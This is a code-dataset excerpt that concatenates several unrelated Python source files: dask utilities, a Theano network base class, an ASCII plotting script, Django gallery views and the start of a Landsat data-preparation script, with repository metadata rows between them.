return rx_bytes, tx_bytes
def getPythonVersionString():
try:
import commands
status, output = commands.getstatusoutput("python -V")
return output.split(' ')[1]
except:
return _("unknown")
# For modules that do "from About import about"
about = modules[__name__]
| gpl-2.0 | 9,068,916,219,085,860,000 | 25.225 | 106 | 0.651096 | false |
PhE/dask | dask/utils.py | 1 | 8629 | from __future__ import absolute_import, division, print_function
from collections import Iterator
from contextlib import contextmanager
from errno import ENOENT
from functools import partial
import os
import sys
import shutil
import struct
import gzip
import tempfile
import inspect
from .compatibility import unicode, long
def raises(err, lamda):
try:
lamda()
return False
except err:
return True
def deepmap(func, *seqs):
""" Apply function inside nested lists
>>> inc = lambda x: x + 1
>>> deepmap(inc, [[1, 2], [3, 4]])
[[2, 3], [4, 5]]
>>> add = lambda x, y: x + y
>>> deepmap(add, [[1, 2], [3, 4]], [[10, 20], [30, 40]])
[[11, 22], [33, 44]]
"""
if isinstance(seqs[0], (list, Iterator)):
return [deepmap(func, *items) for items in zip(*seqs)]
else:
return func(*seqs)
@contextmanager
def ignoring(*exceptions):
try:
yield
except exceptions:
pass
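# Illustrative use (the path is an assumption): silently skip a missing file.
#   with ignoring(OSError):
#       os.remove('/tmp/might-not-exist')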
@contextmanager
def tmpfile(extension='', dir=None):
extension = '.' + extension.lstrip('.')
handle, filename = tempfile.mkstemp(extension, dir=dir)
os.close(handle)
os.remove(filename)
try:
yield filename
finally:
if os.path.exists(filename):
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.remove(filename)
@contextmanager
def filetext(text, extension='', open=open, mode='w'):
with tmpfile(extension=extension) as filename:
f = open(filename, mode=mode)
try:
f.write(text)
finally:
try:
f.close()
except AttributeError:
pass
yield filename
def repr_long_list(seq):
"""
>>> repr_long_list(list(range(100)))
'[0, 1, 2, ..., 98, 99]'
"""
if len(seq) < 8:
return repr(seq)
else:
return repr(seq[:3])[:-1] + ', ..., ' + repr(seq[-2:])[1:]
class IndexCallable(object):
""" Provide getitem syntax for functions
>>> def inc(x):
... return x + 1
>>> I = IndexCallable(inc)
>>> I[3]
4
"""
__slots__ = 'fn',
def __init__(self, fn):
self.fn = fn
def __getitem__(self, key):
return self.fn(key)
@contextmanager
def filetexts(d, open=open):
""" Dumps a number of textfiles to disk
d - dict
a mapping from filename to text like {'a.csv': '1,1\n2,2'}
"""
for filename, text in d.items():
f = open(filename, 'wt')
try:
f.write(text)
finally:
try:
f.close()
except AttributeError:
pass
yield list(d)
for filename in d:
if os.path.exists(filename):
os.remove(filename)
opens = {'gzip': gzip.open}
def textblock(file, start, stop, compression=None):
""" Pull out a block of text from a file given start and stop bytes
This gets data starting/ending from the next newline delimiter
Example
-------
>> with open('myfile.txt', 'w') as f:
.. f.write('123\n456\n789\nabc')
>> f = open('myfile.txt')
In the example below, 1 and 10 don't line up with endlines
>> textblock(f, 1, 10)
'456\n789\n'
"""
if isinstance(file, (str, unicode)):
myopen = opens.get(compression, open)
f = myopen(file, 'rb')
try:
result = textblock(f, start, stop)
finally:
f.close()
return result
if start:
file.seek(start - 1)
line = file.readline() # burn a line
start = file.tell()
if stop is None:
file.seek(start)
return file.read()
stop -= 1
file.seek(stop)
line = file.readline()
stop = file.tell()
file.seek(start)
return file.read(stop - start)
def concrete(seq):
""" Make nested iterators concrete lists
>>> data = [[1, 2], [3, 4]]
>>> seq = iter(map(iter, data))
>>> concrete(seq)
[[1, 2], [3, 4]]
"""
if isinstance(seq, Iterator):
seq = list(seq)
if isinstance(seq, (tuple, list)):
seq = list(map(concrete, seq))
return seq
def skip(func):
pass
def pseudorandom(n, p, key):
""" Pseudorandom array of integer indexes
>>> pseudorandom(5, [0.5, 0.5], key=123)
array([1, 0, 0, 1, 1], dtype=int8)
>>> pseudorandom(10, [0.5, 0.2, 0.2, 0.1], key=5)
array([0, 2, 0, 3, 0, 1, 2, 1, 0, 0], dtype=int8)
"""
import numpy as np
p = list(p)
cp = np.cumsum([0] + p)
assert np.allclose(1, cp[-1])
assert len(p) < 256
x = np.random.RandomState(key).random_sample(n)
out = np.empty(n, dtype='i1')
for i, (low, high) in enumerate(zip(cp[:-1], cp[1:])):
out[(x >= low) & (x < high)] = i
return out
def getargspec(func):
"""Version of inspect.getargspec that works for functools.partial objects"""
if isinstance(func, partial):
return inspect.getargspec(func.func)
else:
if isinstance(func, type):
return inspect.getargspec(func.__init__)
else:
return inspect.getargspec(func)
def is_integer(i):
"""
>>> is_integer(6)
True
>>> is_integer(42.0)
True
>>> is_integer('abc')
False
"""
import numpy as np
if isinstance(i, (int, long)):
return True
if isinstance(i, float):
return (i).is_integer()
if issubclass(type(i), np.integer):
        return True
else:
return False
def file_size(fn, compression=None):
""" Size of a file on disk
If compressed then return the uncompressed file size
"""
if compression == 'gzip':
with open(fn, 'rb') as f:
f.seek(-4, 2)
result = struct.unpack('I', f.read(4))[0]
else:
result = os.stat(fn).st_size
return result
ONE_ARITY_BUILTINS = set([abs, all, any, bool, bytearray, bytes, callable, chr,
classmethod, complex, dict, dir, enumerate, eval, float, format, frozenset,
hash, hex, id, int, iter, len, list, max, min, next, oct, open, ord, range,
repr, reversed, round, set, slice, sorted, staticmethod, str, sum, tuple,
type, vars, zip])
if sys.version_info[0] == 3: # Python 3
ONE_ARITY_BUILTINS |= set([ascii])
if sys.version_info[:2] != (2, 6):
ONE_ARITY_BUILTINS |= set([memoryview])
MULTI_ARITY_BUILTINS = set([compile, delattr, divmod, filter, getattr, hasattr,
isinstance, issubclass, map, pow, setattr])
def takes_multiple_arguments(func):
""" Does this function take multiple arguments?
>>> def f(x, y): pass
>>> takes_multiple_arguments(f)
True
>>> def f(x): pass
>>> takes_multiple_arguments(f)
False
>>> def f(x, y=None): pass
>>> takes_multiple_arguments(f)
False
>>> def f(*args): pass
>>> takes_multiple_arguments(f)
True
>>> class Thing(object):
... def __init__(self, a): pass
>>> takes_multiple_arguments(Thing)
False
"""
if func in ONE_ARITY_BUILTINS:
return False
elif func in MULTI_ARITY_BUILTINS:
return True
try:
spec = getargspec(func)
except:
return False
try:
is_constructor = spec.args[0] == 'self' and isinstance(func, type)
except:
is_constructor = False
if spec.varargs:
return True
if spec.defaults is None:
return len(spec.args) - is_constructor != 1
return len(spec.args) - len(spec.defaults) - is_constructor > 1
class Dispatch(object):
"""Simple single dispatch."""
def __init__(self):
self._lookup = {}
def register(self, type, func):
"""Register dispatch of `func` on arguments of type `type`"""
if isinstance(type, tuple):
for t in type:
self.register(t, func)
else:
self._lookup[type] = func
def __call__(self, arg):
# We dispatch first on type(arg), and fall back to iterating through
# the mro. This is significantly faster in the common case where
# type(arg) is in the lookup, with only a small penalty on fall back.
lk = self._lookup
typ = type(arg)
if typ in lk:
return lk[typ](arg)
for cls in inspect.getmro(typ)[1:]:
if cls in lk:
return lk[cls](arg)
raise TypeError("No dispatch for {0} type".format(typ))
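# Illustrative usage sketch of Dispatch (the handler names are made up):
#   normalize = Dispatch()
#   normalize.register((int, float), lambda x: x * 2)
#   normalize.register(list, lambda seq: [normalize(item) for item in seq])
#   normalize([1, 2.5])  # -> [2, 5.0]
#   normalize('a')       # raises TypeError, no handler registered for str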
def ensure_not_exists(filename):
"""
Ensure that a file does not exist.
"""
try:
os.unlink(filename)
except OSError as e:
if e.errno != ENOENT:
raise
| bsd-3-clause | -3,181,018,165,780,446,000 | 22.576503 | 80 | 0.560436 | false |
moberweger/deep-prior | src/net/netbase.py | 1 | 17161 | """Provides NetBase class for generating networks from configurations.
NetBase provides interface for building CNNs.
It should be inherited by all network classes in order to provide
basic functionality, ie computing outputs, creating computational
graph, managing dropout, etc.
NetBaseParams is the parametrization of these NetBase networks.
Copyright 2015 Markus Oberweger, ICG,
Graz University of Technology <[email protected]>
This file is part of DeepPrior.
DeepPrior is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
DeepPrior is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with DeepPrior. If not, see <http://www.gnu.org/licenses/>.
"""
import difflib
import gzip
import time
import numpy
import cPickle
import re
import theano
import theano.tensor as T
from net.convpoollayer import ConvPoolLayer, ConvPoolLayerParams
from net.convlayer import ConvLayer, ConvLayerParams
from net.hiddenlayer import HiddenLayer, HiddenLayerParams
from net.poollayer import PoolLayer, PoolLayerParams
from net.dropoutlayer import DropoutLayer, DropoutLayerParams
__author__ = "Markus Oberweger <[email protected]>"
__copyright__ = "Copyright 2015, ICG, Graz University of Technology, Austria"
__credits__ = ["Paul Wohlhart", "Markus Oberweger"]
__license__ = "GPL"
__version__ = "1.0"
__maintainer__ = "Markus Oberweger"
__email__ = "[email protected]"
__status__ = "Development"
class NetBaseParams(object):
def __init__(self):
"""
Init the parametrization
"""
self.numInputs = 1
self.numOutputs = 1
self.layers = []
self.inputDim = None
self.outputDim = None
def getMemoryRequirement(self):
"""
Get memory requirements of weights
:return: memory requirement
"""
mem = 0
for l in self.layers:
mem += l.getMemoryRequirement()
return mem
class NetBase(object):
def __init__(self, rng, inputVar, cfgParams, twin=None):
"""
Initialize object by constructing the layers
:param rng: random number generator
:param inputVar: input variable
:param cfgParams: parameters
:param twin: determine to copy layer @deprecated
:return: None
"""
self._params_filter = []
self._weights_filter = []
self.inputVar = inputVar
self.cfgParams = cfgParams
self.rng = rng
# create network
self.layers = []
i = 0
for layerParam in cfgParams.layers:
# first input is inputVar, otherwise input is output of last one
if i == 0:
inp = inputVar
else:
# flatten output from conv to hidden layer and reshape from hidden to conv layer
if (len(self.layers[-1].cfgParams.outputDim) == 4) and (len(layerParam.inputDim) == 2):
inp = self.layers[-1].output.flatten(2)
inp.name = "input_layer_{}".format(i) # name this node as it is different from previous output
elif (len(layerParam.inputDim) == 4) and (len(self.layers[-1].cfgParams.outputDim) == 2):
inp = T.reshape(self.layers[-1].output, layerParam.inputDim, ndim=4)
inp.name = "input_layer_{}".format(i) # name this node as it is different from previous output
else:
inp = self.layers[-1].output
id = layerParam.__class__.__name__[:-6]
constructor = globals()[id]
self.layers.append(constructor(rng,
inputVar=inp,
cfgParams=layerParam,
copyLayer=None if (twin is None) else twin.layers[i],
layerNum=i))
i += 1
# assemble externally visible parameters
self.output = self.layers[-1].output
# TODO test
# Ngyuen Widrow initialization
# for l in range(len(self.layers)):
# if isinstance(self.layers[l], HiddenLayer) or isinstance(self.layers[l], HiddenLayerInv):
# if l > 0:
# self.resetWeightsNW(rng, self.layers[l-1].cfgParams.getOutputRange(), self.layers[l], self.layers[l].cfgParams.getOutputRange())
# else:
# self.resetWeightsNW(rng, [-1, 1], self.layers[l], self.layers[l].cfgParams.getOutputRange())
def __str__(self):
"""
prints the parameters of the layers of the network
:return: configuration string
"""
cfg = "Network configuration:\n"
i = 0
for l in self.layers:
cfg += "Layer {}: {} with {} \n".format(i, l.__class__.__name__, l)
i += 1
return cfg
@property
def params(self):
"""
Get a list of the learnable theano parameters for this network.
:return: list of theano variables
"""
# remove filtered params
if not hasattr(self, '_params_filter'):
self._params_filter = []
prms = [p for l in self.layers for p in l.params if p.name not in self._params_filter]
# only unique variables, remove shared weights from list
return dict((obj.auto_name, obj) for obj in prms).values()
@property
def params_filter(self):
return self._params_filter
@params_filter.setter
def params_filter(self, bl):
names = [p.name for l in self.layers for p in l.params]
for b in bl:
if b not in names:
raise UserWarning("Param {} not in model!".format(b))
self._params_filter = bl
@property
def weights(self):
"""
Get a list of the weights for this network.
:return: list of theano variables
"""
# remove filtered weights
if not hasattr(self, '_weights_filter'):
self._weights_filter = []
prms = [p for l in self.layers for p in l.weights if p.name not in self._weights_filter]
# only unique variables, remove shared weights from list
return dict((obj.auto_name, obj) for obj in prms).values()
@property
def weights_filter(self):
return self._weights_filter
@weights_filter.setter
def weights_filter(self, bl):
names = [p.name for l in self.layers for p in l.weights]
for b in bl:
if b not in names:
raise UserWarning("Weight {} not in model!".format(b))
self._weights_filter = bl
def computeOutput(self, inputs, timeit=False):
"""
compute the output of the network for given input
:param inputs: input data
:param timeit: print the timing information
:return: output of the network
"""
# Convert input data
if not isinstance(inputs, list):
inputs = [inputs]
# All data must be same
assert all(i.shape[0] == inputs[0].shape[0] for i in inputs[1:])
if self.dropoutEnabled():
print("WARNING: dropout is enabled in at least one layer for testing, DISABLING")
self.disableDropout()
floatX = theano.config.floatX # @UndefinedVariable
batch_size = self.cfgParams.batch_size
nSamp = inputs[0].shape[0]
padSize = int(batch_size * numpy.ceil(nSamp / float(batch_size)))
out = []
if isinstance(self.output, list):
for i in range(len(self.output)):
outSize = list(self.cfgParams.outputDim[i])
outSize[0] = padSize
out.append(numpy.zeros(tuple(outSize), dtype=floatX))
else:
outSize = list(self.cfgParams.outputDim)
outSize[0] = padSize
out.append(numpy.zeros(tuple(outSize), dtype=floatX))
index = T.lscalar('index')
if not hasattr(self, 'compute_output'):
self.input_data = []
self.input_givens = dict()
input_pad = []
if inputs[0].shape[0] < batch_size:
for k in range(len(inputs)):
shape = list(inputs[k].shape)
shape[0] = batch_size
input_pad.append(numpy.zeros(tuple(shape), dtype=floatX))
input_pad[k][0:inputs[k].shape[0]] = inputs[k][0:inputs[k].shape[0]]
input_pad[k][inputs[k].shape[0]:] = inputs[k][-1]
else:
for k in range(len(inputs)):
input_pad.append(inputs[k])
for i in range(len(inputs)):
if len(inputs) == 1 and not isinstance(self.inputVar, list):
self.input_data.append(theano.shared(input_pad[i][0:batch_size], self.inputVar.name, borrow=True))
self.input_givens[self.inputVar] = self.input_data[i][index * batch_size:(index + 1) * batch_size]
else:
assert isinstance(self.inputVar, list)
self.input_data.append(theano.shared(input_pad[i][0:batch_size], self.inputVar[i].name, borrow=True))
self.input_givens[self.inputVar[i]] = self.input_data[i][index * batch_size:(index + 1) * batch_size]
print("compiling compute_output() ...")
self.compute_output = theano.function(inputs=[index], outputs=self.output, givens=self.input_givens,
mode='FAST_RUN', on_unused_input='warn')
print("done")
# iterate to save memory
n_test_batches = padSize / batch_size
start = time.time()
for i in range(n_test_batches):
# pad last batch to batch size
if i == n_test_batches-1:
input_pad = []
for k in range(len(inputs)):
shape = list(inputs[k].shape)
shape[0] = batch_size
input_pad.append(numpy.zeros(tuple(shape), dtype=floatX))
input_pad[k][0:inputs[k].shape[0]-i*batch_size] = inputs[k][i*batch_size:]
input_pad[k][inputs[k].shape[0]-i*batch_size:] = inputs[k][-1]
for k in range(len(inputs)):
self.input_data[k].set_value(input_pad[k], borrow=True)
else:
for k in range(len(inputs)):
self.input_data[k].set_value(inputs[k][i * batch_size:(i + 1) * batch_size], borrow=True)
o = self.compute_output(0)
if isinstance(self.output, list):
for k in range(len(self.output)):
out[k][i * batch_size:(i + 1) * batch_size] = o[k]
else:
out[0][i * batch_size:(i + 1) * batch_size] = o.reshape(self.cfgParams.outputDim)
end = time.time()
if timeit:
print("{} in {}s, {}ms per frame".format(padSize, end - start, (end - start)*1000./padSize))
if isinstance(self.output, list):
for k in range(len(self.output)):
out[k] = out[k][0:nSamp]
return out
else:
return out[0][0:nSamp]
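    # Illustrative call (shapes are assumptions): for a net built with
    # cfgParams.inputDim = (batch_size, 1, 128, 128),
    #   out = net.computeOutput(numpy.ones((500, 1, 128, 128), dtype='float32'))
    # pads the 500 samples up to a multiple of batch_size internally and
    # returns an array of shape (500,) + outputDim[1:].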
def enableDropout(self):
"""
Enables dropout in all dropout layers, ie for training
:return: None
"""
for layer in self.layers:
if isinstance(layer, DropoutLayer):
layer.enableDropout()
def disableDropout(self):
"""
Disables dropout in all dropout layers, ie for classification
:return: None
"""
for layer in self.layers:
if isinstance(layer, DropoutLayer):
layer.disableDropout()
def dropoutEnabled(self):
"""
Disables dropout in all dropout layers, ie for classification
:return: None
"""
for layer in self.layers:
if isinstance(layer, DropoutLayer):
if layer.dropoutEnabled():
return True
return False
def hasDropout(self):
"""
Checks if network has dropout layers
:return: True if there are dropout layers
"""
for layer in self.layers:
if isinstance(layer, DropoutLayer):
return True
return False
@property
def weightVals(self):
"""
Returns list of the weight values
:return: list of weight values
"""
return self.recGetWeightVals(self.params)
@weightVals.setter
def weightVals(self, value):
"""
Set weights with given values
:param value: values for weights
:return: None
"""
self.recSetWeightVals(self.params, value)
def recSetWeightVals(self, param, value):
"""
Set weights with given values
:param param: layer parameters listing the layers weights
:param value: values for weights
:return: None
"""
if isinstance(value, list):
assert isinstance(param, list), "tried to assign a list of weights to params, which is not a list {}".format(type(param))
assert len(param) == len(value), "tried to assign unequal list of weights {} != {}".format(len(param), len(value))
for i in xrange(len(value)):
self.recSetWeightVals(param[i], value[i])
else:
param.set_value(value)
def recGetWeightVals(self, param):
"""
Returns list of the weight values
:param param: layer parameters listing the layers weights
:return: list of weight values
"""
w = []
if isinstance(param, list):
for p in param:
w.append(self.recGetWeightVals(p))
else:
w = param.get_value()
return w
def save(self, filename):
"""
Save the state of this network to a pickle file on disk.
:param filename: Save the parameters of this network to a pickle file at the named path. If this name ends in
".gz" then the output will automatically be gzipped; otherwise the output will be a "raw" pickle.
:return: None
"""
state = dict([('class', self.__class__.__name__), ('network', self.__str__())])
for layer in self.layers:
key = '{}-values'.format(layer.layerNum)
state[key] = [p.get_value() for p in layer.params]
opener = gzip.open if filename.lower().endswith('.gz') else open
handle = opener(filename, 'wb')
cPickle.dump(state, handle, -1)
handle.close()
        print 'Saved model parameters to {}'.format(filename)
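    # Illustrative round trip (the path is an assumption): net.save('net.pkl.gz')
    # writes a gzipped pickle because of the '.gz' suffix; a second instance
    # with the same configuration can restore it with net.load('net.pkl.gz').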
def load(self, filename):
"""
Load the parameters for this network from disk.
:param filename: Load the parameters of this network from a pickle file at the named path. If this name ends in
".gz" then the input will automatically be gunzipped; otherwise the input will be treated as a "raw" pickle.
:return: None
"""
opener = gzip.open if filename.lower().endswith('.gz') else open
handle = opener(filename, 'rb')
saved = cPickle.load(handle)
handle.close()
if saved['network'] != self.__str__():
print "Possibly not matching network configuration!"
differences = list(difflib.Differ().compare(saved['network'].splitlines(), self.__str__().splitlines()))
print "Differences are:"
print "\n".join(differences)
for layer in self.layers:
if len(layer.params) != len(saved['{}-values'.format(layer.layerNum)]):
print "Warning: Layer parameters for layer {} do not match. Trying to fit on shape!".format(layer.layerNum)
n_assigned = 0
for p in layer.params:
for v in saved['{}-values'.format(layer.layerNum)]:
if p.get_value().shape == v.shape:
p.set_value(v)
n_assigned += 1
if n_assigned != len(layer.params):
raise ImportError("Could not load all necessary variables!")
else:
print "Found fitting parameters!"
else:
prms = layer.params
for p, v in zip(prms, saved['{}-values'.format(layer.layerNum)]):
if p.get_value().shape == v.shape:
p.set_value(v)
else:
print "WARNING: Skipping parameter for {}! Shape {} does not fit {}.".format(p.name, p.get_value().shape, v.shape)
print 'Loaded model parameters from {}'.format(filename) | gpl-3.0 | -8,016,346,717,327,464,000 | 37.740406 | 150 | 0.569489 | false |
per9000/naiveplot | src/nplot.py | 1 | 5073 | #!/usr/bin/python
from argparse import ArgumentParser
from sys import stdin
from string import ascii_uppercase
from naiveplot import NaivePlot, Curve, Point, Line
class NaiveParserPlotter:
"""Class for reading and plotting"""
def __init__(self):
"""Setup place holders"""
self.args = None
self.points = None
self.lines = None
self.colors = None
self.plot = None
return
def setup(self):
"""Do all setup after parsing args"""
self.get_handle()
self.setup_formats()
return
def get_handle(self):
"""Get a handle to read from"""
if self.args.std_in:
self.handle = stdin
elif self.args.in_file:
self.handle = open(self.args.in_file, 'r')
else:
pass # TODO: exception?
return
def setup_formats(self):
"""Return format vectors"""
self.points = list(ascii_uppercase)
self.lines = ['.', '-', ':', '~', "'"]
self.colors = ['blue', 'red', 'green', 'yellow', 'magenta', 'cyan',
'grey'] #'white'
return
def get_format(self, idx):
"""get approproate combo"""
attrs = list()
for container in [self.points, self.lines, self.colors]:
attrs.append(container[idx%len(container)])
return tuple(attrs)
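    # For example, with the default format lists get_format(0) yields
    # ('A', '.', 'blue') and get_format(1) yields ('B', '-', 'red'); each
    # list simply wraps around for larger indices.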
def parse_args(self, args=None):
"""Parse the arguments"""
parser = ArgumentParser(description="Plot the numbers given in a file "
"or in stdin")
rgroup = parser.add_argument_group("Read from...")
rgroup.add_argument('--std-in', action="store_true", default=False,
help="Perform doc tests and exit instead.")
rgroup.add_argument('--in-file', '-f', type=str, default=None,
help="Specify input file path.")
dgroup = parser.add_argument_group("Input data...")
dgroup.add_argument('--xy', '-x', action="store_true", default=False,
help="Treat first column as x values, and the "
"following as y-values (default False).")
dgroup.add_argument('--col', '-c', action="append", dest='cols',
type=int, default=list(),
help="Specify which columns to investigate. "
"Repeat if needed. Default: All")
dgroup.add_argument('--ignore-first', '-i', action="store_true",
default=False, help="ignore first line")
dgroup.add_argument('--sep', '-s', default=' ',
help="Specify separator, default: space")
fgroup = parser.add_argument_group("Formatting...")
fgroup.add_argument('--gap', '-g', type=float, default=0.01,
help="inverted number of subpoints in lines")
fgroup.add_argument('--not-implemented')
if args:
self.args = parser.parse_args(args)
else:
self.args = parser.parse_args()
return
def process(self):
"""Do the real work"""
ctr = 0
olds = None
pcontainer = list()
self.plot = NaivePlot(xmin=-0.1, ymin=-0.1)
for line in self.handle:
ctr += 1
if ctr == 1 and self.args.ignore_first:
continue
values = [float(val.strip()) for val in \
line.strip().split(self.args.sep) if val]
x = float(ctr)
if self.args.xy:
x = float(values[0])
points = [Point(x, val) for val in values if x and val]
pcontainer.append(points)
if olds:
for i in xrange(len(points)):
if not self.args.cols or i not in self.args.cols:
continue
if not olds[i] or not points[i]:
continue
l = Line(olds[i], points[i])
(_, lchar, lcol) = self.get_format(i)
self.plot.add_curve(Curve(l, 0.0, 1.0, self.args.gap),
lchar, lcol)
olds = points
(xmin, xmax, ymin, ymax) = (0, 0, 0, 0)
for points in pcontainer:
for i in xrange(len(points)):
if not self.args.cols or i not in self.args.cols:
continue
(pchar, _, pcol) = self.get_format(i)
self.plot.add_curve(points[i], pchar, pcol)
xmin = min(xmin, points[i].x)
xmax = max(xmax, points[i].x)
ymin = min(ymin, points[i].y)
ymax = max(ymax, points[i].y)
self.plot.zoom(xmin, xmax, ymin, ymax)
return
def __str__(self):
"""just print"""
return str(self.plot)
if __name__ == "__main__":
npp = NaiveParserPlotter()
npp.parse_args()
npp.setup()
npp.process()
print npp
| gpl-3.0 | -1,404,144,900,113,913,000 | 32.156863 | 79 | 0.500099 | false |
cpodlesny/lisbon | src/gallery/views.py | 1 | 7355 | from django.contrib import messages
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.core.urlresolvers import reverse
from django.shortcuts import render, redirect, get_object_or_404
from django.utils.translation import ugettext_lazy as _
from helpers.models import Helpers
from offer.models import OfferCategory
from tours.models import Category
from .forms import GalleryForm
from .models import Gallery
def get_lang(request):
lang = request.LANGUAGE_CODE
return lang
def get_company():
return Helpers.objects.get(id=1).company_name
def gallery_list(request):
query = request.GET.get('q')
if query:
return redirect(reverse('search') + '?q=' + query)
footer = {
'pt': Helpers.objects.get(id=1).about_footer_PT,
'en': Helpers.objects.get(id=1).about_footer_EN,
'de': Helpers.objects.get(id=1).about_footer_DE
}
lang = get_lang(request)
queryset_list = Gallery.objects.all()
breadcrumbs = [
{'url': '/', 'name': _('Home')},
{'url': '#', 'name': _('Gallery'), 'active': True}
]
paginator = Paginator(queryset_list, 6)
page_request_var = 'page'
page = request.GET.get(page_request_var)
try:
queryset = paginator.page(page)
except PageNotAnInteger:
queryset = paginator.page(1)
except EmptyPage:
queryset = paginator.page(paginator.num_pages)
context = {
'footer': {
'about': footer[lang],
'icon': Helpers.objects.get(id=1).footer_icon
},
'nav': {
'tour_categories_list': Category.objects.all(),
'offer_categories_list': OfferCategory.objects.all(),
},
'company': get_company(),
'title': _('Gallery'),
'breadcrumbs': breadcrumbs,
'object_list': queryset,
'page_request_var': page_request_var,
}
return render(request, 'partials/gallery.html', context)
def gallery_detail(request, pk=None):
query = request.GET.get('q')
if query:
return redirect(reverse('search') + '?q=' + query)
gallery = Gallery.objects.get(pk=pk)
lang = get_lang(request)
footer = {
'pt': Helpers.objects.get(id=1).about_footer_PT,
'en': Helpers.objects.get(id=1).about_footer_EN,
'de': Helpers.objects.get(id=1).about_footer_DE
}
gallery_title = {
'pt': gallery.title_PT,
'en': gallery.title_EN,
'de': gallery.title_DE
}
gallery_description = {
'pt': gallery.description_PT,
'en': gallery.description_EN,
'de': gallery.description_DE
}
breadcrumbs = [
{'url': '/', 'name': _('Home')},
{'url': '/gallery', 'name': _('Gallery')},
{'url': '#', 'name': gallery_title[lang], 'active': True}
]
gallery_current = {
'title': gallery_title[lang],
'description': gallery_description[lang],
'id': gallery.id,
'video': gallery.video,
'img': gallery.img,
'img1': gallery.img_1,
'img2': gallery.img_2,
'img3': gallery.img_3,
}
context = {
'footer': {
'about': footer[lang],
'icon': Helpers.objects.get(id=1).footer_icon
},
'nav': {
'tour_categories_list': Category.objects.all(),
'offer_categories_list': OfferCategory.objects.all(),
},
'company': get_company(),
'breadcrumbs': breadcrumbs,
'title': gallery_title[lang],
'object': gallery_current,
}
return render(request, 'templates/_gallery_details.html', context)
def gallery_update(request, pk=None):
query = request.GET.get('q')
if query:
return redirect(reverse('search') + '?q=' + query)
footer = {
'pt': Helpers.objects.get(id=1).about_footer_PT,
'en': Helpers.objects.get(id=1).about_footer_EN,
'de': Helpers.objects.get(id=1).about_footer_DE
}
lang = get_lang(request)
if not request.user.is_staff or not request.user.is_superuser:
return redirect('accounts:signup')
else:
gallery = get_object_or_404(Gallery, pk=pk)
lang = get_lang(request)
gallery_title = {
'pt': gallery.title_PT,
'en': gallery.title_EN,
'de': gallery.title_DE
}
breadcrumbs = [
{'url': '/', 'name': _('Home')},
{'url': '/gallery', 'name': _('Gallery')},
{'url': '#', 'name': gallery_title[lang], 'active': True}
]
form = GalleryForm(request.POST or None, request.FILES or None, instance=gallery)
if form.is_valid():
gallery = form.save(commit=False)
gallery.save()
messages.success(request, _('Gallery edited'))
return redirect('gallery:list')
context = {
'footer': {
'about': footer[lang],
'icon': Helpers.objects.get(id=1).footer_icon
},
'nav': {
'tour_categories_list': Category.objects.all(),
'offer_categories_list': OfferCategory.objects.all(),
},
'company': get_company(),
'title': _('Gallery edit'),
'breadcrumbs': breadcrumbs,
'instance': gallery,
'form': form,
'value': _('Add'),
}
return render(request, 'templates/_form.html', context)
def gallery_create(request):
query = request.GET.get('q')
if query:
return redirect(reverse('search') + '?q=' + query)
lang = get_lang(request)
footer = {
'pt': Helpers.objects.get(id=1).about_footer_PT,
'en': Helpers.objects.get(id=1).about_footer_EN,
'de': Helpers.objects.get(id=1).about_footer_DE
}
if not request.user.is_staff or not request.user.is_superuser:
return redirect('accounts:signup')
else:
form = GalleryForm(request.POST or None, request.FILES or None)
breadcrumbs = [
{'url': '/', 'name': _('Home')},
{'url': '/gallery', 'name': _('Gallery')},
{'url': '#', 'name': _('Create Gallery'), 'active': True}
]
if form.is_valid():
instance = form.save(commit=False)
instance.user = request.user
instance.save()
messages.success(request, _('Gallery created'))
return redirect('gallery:list')
context = {
'footer': {
'about': footer[lang],
'icon': Helpers.objects.get(id=1).footer_icon
},
'nav': {
'tour_categories_list': Category.objects.all(),
'offer_categories_list': OfferCategory.objects.all(),
},
'company': get_company(),
'title': _('Create Gallery'),
'breadcrumbs': breadcrumbs,
'value': _('Add'),
'form': form
}
return render(request, 'templates/_form.html', context)
def gallery_delete(request, pk=None):
if not request.user.is_staff or not request.user.is_superuser:
return redirect('accounts:signup')
instance = get_object_or_404(Gallery, pk=pk)
instance.delete()
messages.success(request, _('Gallery deleted'))
return redirect('gallery:list')
| mit | 9,215,973,351,278,447,000 | 31.982063 | 89 | 0.55758 | false |
ceos-seo/Data_Cube_v2 | agdc-v2/utils/usgslsprepare.py | 1 | 8328 | # coding=utf-8
"""
Ingest data from the command-line.
"""
from __future__ import absolute_import, division
import logging
import uuid
from xml.etree import ElementTree
import re
from pathlib import Path
import yaml
from dateutil import parser
from datetime import timedelta
import rasterio.warp
import click
from osgeo import osr
import os
# image boundary imports
import rasterio
from rasterio.errors import RasterioIOError
import rasterio.features
import shapely.affinity
import shapely.geometry
import shapely.ops
_STATIONS = {'023': 'TKSC', '022': 'SGS', '010': 'GNC', '011': 'HOA',
'012': 'HEOC', '013': 'IKR', '014': 'KIS', '015': 'LGS',
'016': 'MGR', '017': 'MOR', '032': 'LGN', '019': 'MTI', '030': 'KHC',
'031': 'MLK', '018': 'MPS', '003': 'BJC', '002': 'ASN', '001': 'AGS',
'007': 'DKI', '006': 'CUB', '005': 'CHM', '004': 'BKT', '009': 'GLC',
'008': 'EDC', '029': 'JSA', '028': 'COA', '021': 'PFS', '020': 'PAC'}
###IMAGE BOUNDARY CODE
def safe_valid_region(images, mask_value=None):
try:
return valid_region(images, mask_value)
except (OSError, RasterioIOError):
return None
def valid_region(images, mask_value=None):
mask = None
for fname in images:
## ensure formats match
with rasterio.open(str(fname), 'r') as ds:
transform = ds.affine
img = ds.read(1)
if mask_value is not None:
new_mask = img & mask_value == mask_value
else:
new_mask = img != ds.nodata
if mask is None:
mask = new_mask
else:
mask |= new_mask
shapes = rasterio.features.shapes(mask.astype('uint8'), mask=mask)
shape = shapely.ops.unary_union([shapely.geometry.shape(shape) for shape, val in shapes if val == 1])
# convex hull
geom = shape.convex_hull
# buffer by 1 pixel
geom = geom.buffer(1, join_style=3, cap_style=3)
# simplify with 1 pixel radius
geom = geom.simplify(1)
# intersect with image bounding box
geom = geom.intersection(shapely.geometry.box(0, 0, mask.shape[1], mask.shape[0]))
# transform from pixel space into CRS space
geom = shapely.affinity.affine_transform(geom, (transform.a, transform.b, transform.d,
transform.e, transform.xoff, transform.yoff))
